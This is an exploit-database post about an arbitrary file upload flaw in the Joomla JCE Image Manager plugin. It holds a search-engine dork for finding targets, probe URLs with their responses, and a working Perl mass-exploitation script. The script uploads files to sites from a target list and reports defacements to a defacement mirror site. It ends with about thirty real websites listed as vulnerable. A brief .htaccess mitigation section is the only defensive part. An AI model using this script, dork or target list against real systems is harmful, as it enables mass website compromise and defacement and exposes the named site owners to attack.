Joomla JCE 2.6.33 Arbitrary File Upload



EKU-ID: 8183 CVE: OSVDB-ID:
Author: KingSkrupellos Published: 2018-12-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#################################################################################

# Exploit Title :  Joomla Content Editor JCE com_jce Components Image
Manager Plugin 2.6.33 Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Vulnerability Published Date : 30/11/2018
# Vulnerability First Discovered Date : 10/03/2014
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads /
+ extensions.joomla.org/extension/jce/ ~
joomlacontenteditor.net/downloads/editor/core ~
+ joomlacontenteditor.net/downloads/editor/core/9
+ JCE 2.6.33 =>
joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=
f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.6.7.1 =>
joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=
1255&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=547c7217f6fad641a91db0b982dd72b6
# Version Information : From JCE 2.6.7.1 to JCE 2.6.33 All Versions are
affected.
+ Installation package for Joomla! 2.5 & 3.x  - Previous Versions before
2.x are not affected.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks => inurl:''/index.php?option=com_jce''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]

##############################################################################################

++++++++++++ Extended Exploit and Vulnerability Information Reference Links
+++++++++++++

# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018050200
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2118
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=29762
# SecurityNewsWire Exploit Link :
securitynewswire.com/latestsecuritynews/mobile_article.php?title=
Joomla_Content_Editor_JCE_ImageManager_Vulnerability_Mass_Auto_Exploiter
# Reddit Exploit Link : :
reddit.com/r/phpAdvisories/comments/8lzi1t/joomla_content_editor_jce_imagemanager/
# HackerTor Exploit Link :
hackertor.com/2018/05/24/joomla-content-editor-jce-imagemanager-vulnerability-mass-auto-exploiter/
# PhpSecure Exploit Link : phpsecure.info/go/163420.html
# Cyberizm Exploit Link :
cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html

##############################################################################################

Original Exploit Title :

Joomla Content Editor JCE Image Manager Plugin 2.6.33 Remote File Upload
Vulnerability and Mass Autor Exploiter Perl

##############################################################################################

# Description of the Product =>

JCE makes creating and editing Joomla!A(r) content easy...
Add a set of tools to your Joomla!A(r) environment that gives you the power to
create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML,
CSS...

Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your
articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts in your site
using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor
Profiles

Media Manager => Upload and insert a range of common media files including
AdobeA(r) FlashA(r), Apple QuicktimeA(r),
Windows Media PlayerA(r) and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options

Image Manager Extended => Create a thumbnail of any part of an image with
the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible
Popup Extension

Filemanager => Create links to images, documents, media and other common
file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.

Template Manager => Insert pre-defined template content form html or text
files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles

##############################################################################################

Outdated versions of the Joomla extension JCE contain a very serious
security vulnerability

that allows a hacker to upload files remotely to a website.

You can search all plugins and themes to find more sites.

Most of them have this plugin JCE installed. [ % 40 or more ] Use your
brain.

Explanation for Joomla Content Editor JCE =>

[ ScreenShot from Administrator Control Panel ] =>

cdn.pbrd.co/images/Hmx6KZC.jpg  ~ cdn.pbrd.co/images/HmypA0v.png

Note : This Joomla JCE is not the previous exploit going to this path =>
..../images/stories/......php   => NO

Previous Version Exploit Link => bugreport.ir/78/exploit.htm => This
doesn't work for this vulnerability.

Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the
Administration Panel

[ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg

This exploit have no path :

We don't need any username and pass for bypassing the admin panel. There is
a little trick here.

TARGETSAdegTE/yourfilename.png  .gif  .jpg  or
TARGETSAdegTE/images/yourfilename.html => YES

 .php .asp  .jpg  .gif .png  =>

##############################################################################################

Install JCE Editor in Joomla! 2.5 Tutorial

[video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]

Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial

[video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]

How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content
Editor. Fix the Bugs for this Vulnerability

[video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]

##############################################################################################

Solution for this Security Issue =>

Add .htaccess file in /images/ and for /public_html/ homepage folder that
disallows any scripts to be run.

Put this in your .htaccess file:

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml
.sh .cgi .exe .png .jpg .gif .txt .html .htm
Options -ExecCGI

that makes it so scripts of those extensions are not allowed to run, and
will generate a FORBIDDEN error if tried.

Another thing to consider in the .htaccess, is something like this:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite.com/.*$ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]

The above will not allow anyone to view the images unless they are viewing
them

as content on "yourwebsite.com". This stops people from linking your images.

Or you can try this =>

1. add the following .htaccess into ./images/.htaccess folder to prevent
php shell running

#####################
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp
.aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml .gif .png .jpg .txt
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6
.phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
.gif .png .jpg .txt

#####################

2. deny access to /tmp folder by adding ./tmp/.htaccess with the following
content

#####################

deny from all

#####################

##############################################################################################

You can check with this exploit codes on your browser if the sites are
vulnerable for testing the security. So you will see some errors.

For Exploiting the Sites - use Auto Mass Exploiter Perl.

Exploit =>

/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20

{"result":{"error":true,"result":""},"error":null}

Exploit =>

/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":null,"error":"No function call specified!"}

Exploit =>

/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":null,"error":"No function call specified!"}

Directory File Path =>

TARGETSAdegTE/yourfilename.png

or

TARGETSAdegTE/images/yourfilename.png

##############################################################################################

Joomla JCE Image Manager Auto Mass Exploiter Perl =>

#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title Joomla JCE All Versions Mass Auto Exploiter Perl by
KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Please Give WebSites List Here:";
my $list=<STDIN>;
chomp($list);
  open (THETARGET, "<$list") || die ">>>WebSite cannot be open. Wrong URL
Link<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;

foreach $site(@TARGETS){

chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload  $site\n";

$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
    open(save, '>>C:\Users\YOURNAMEHERE\KingSkrupellos\result\list.txt');

print "\n[Uploading]";
my $res = $ua->post($vulnurl,
    Content_Type => 'form-data',
    Content => [
        'upload-dir' => './../../',
        'upload-overwrite' => 0,
        'Filedata' => ["kingskrupellos.png"],
        'action' => 'upload'

        ]
    )->decoded_content;
if ($res =~ m/"error":false/i){

}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}

$remote = IO::Socket::INET->new(
        Proto=>
        PeerAddr=>"$site",
        PeerPort=>
        Timeout=>
        );
$def= "$site/kingskrupellos.png";
print colored ("[+]Successfully Exploited",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Don't Work. Wrong URL Link. Not
Vulnerable.<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){

$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($zn,[
'defacer'     => $def,
'domain1'   => $dmn,
'hackmode' => '15',
'reason'       => '1',
'GAPnder'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Send WebSites to Mirror $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Error Has Occured",'black on_white'),"\n";
}
     }else{
print" Zone Could'nt be Taken From Aljyyosh!! \n";

}
}

##############################################################################################

# Usage Explained =>

Download XAMPP for your Operating System => apachefriends.org/download.html

XAMPP for Windows 5.6.38, 7.0.32, 7.1.24 & 7.2.12

XAMPP for Linux 5.6.38, 7.0.32, 7.1.24 & 7.2.12

XAMPP for OS X 5.6.38, 7.0.32, 7.1.24, 7.2.12, XAMPP-VM & XAMPP-VM

How to use this code perl on your operating system like Windows ;  [ You
can run this code also for Linux OS, too. ]

Open Start + Go to Search Button + Type + Command Prompt => or cmd.exe

Or you can use ConEmulator for Windows => conemu.github.io  => Download it
and use it.

Create a folder like " jcee " in your Desktop and put your jceexploit.pl
and yourimagefile.png  ,gif  ,png ,html ,txt

C:/Users/Your-Computer-Name/

cd Desktop

cd "jcee"

perl yourexploitcodenamejce.pl

site.txt

Waiting for Upload

Exploit Successful or Not

Finished

##############################################################################################

Example Vulnerable Sites => [ More on Search Engines like Google - Yahoo -
Bing and others etc.. - Use your Brain... ]

abcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":{"error":true,"result":""},"error":null}

sv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

http://www.mocollc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

sisdesign.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

horizonclimatecontrols.ca/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

living-anatomy.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vera-karelli.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

noatrans.fr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vietthiphotography.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

franciscoqueiroz.com.br/portal/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

dessupoiu.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

restoran-tamada.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

elsonllc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

aidem.in/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

ruralsouthtexasedc.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

parbutaranfurniture.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

anhadesigns.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

heartofasportsman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

sv-langwedel.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

laboratoriodellarte.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

wagadu-jikke.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

lasolida.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

premiorenatofucini.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

poliambulatoriolattanzi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

specialitainvetrina.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

comune.scalea.cs.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

cavambrosiano.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

fratellidisoledad.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vitaminasport.bg/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

personnalisationcarte.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

taxi3305050.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

studioconsulenzasportiva.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

misericordiamontalto.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}


    THE END

##############################################################################################

Author is not responsible for any damage of the websites. This Article has
been written with the purpose of education.

##############################################################################################

Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##############################################################################################